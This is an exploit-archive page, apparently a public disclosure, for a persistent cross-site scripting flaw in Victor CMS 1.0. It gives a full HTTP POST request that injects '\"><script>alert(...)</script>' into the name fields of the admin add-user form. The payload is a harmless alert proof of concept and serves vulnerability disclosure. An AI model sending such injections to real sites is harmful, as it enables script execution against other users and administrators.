Victor CMS 1.0 Cross Site Scripting

Victor CMS 1.0 Cross Site Scripting: Posted May 25, 2020; Authored by Nitya Nand; Victor CMS version 1.0 suffers from an add_user persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | af2d44af85919ce3ff7507d9ddeb9effeb9185aebb9e00c04d9f22a22b331924; Download | Favorite | View

Victor CMS 1.0 Cross Site Scripting

# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
# Google Dork: N/A 
# Date: 2020-05-23 
# Exploit Author: Nitya Nand 
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite 
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip 
# Version: 1.0 
# Tested on: Linux 
# CVE : N/A


Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: <script>alert(1)</script>
POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpmaster/admin/users.php?source=add_user
Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
Content-Length: 417375
Connection: close
Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
Upgrade-Insecure-Requests: 1

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_name"
"><script>alert(1)</script>

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_firstname"
"><script>alert(2)</script>

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_lastname"
"><script>alert(3)</script>

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
Content-Type: image/jpeg

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_role"
User

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_email"
abc@gmail.com

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="user_password"
1234

-----------------------------515906178311115682892435428

Content-Disposition: form-data; name="create_user"

Add User
-----------------------------515906178311115682892435428--

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Victor CMS 1.0 Cross Site Scripting

Victor CMS 1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Victor CMS 1.0 Cross Site Scripting

Share This

Victor CMS 1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems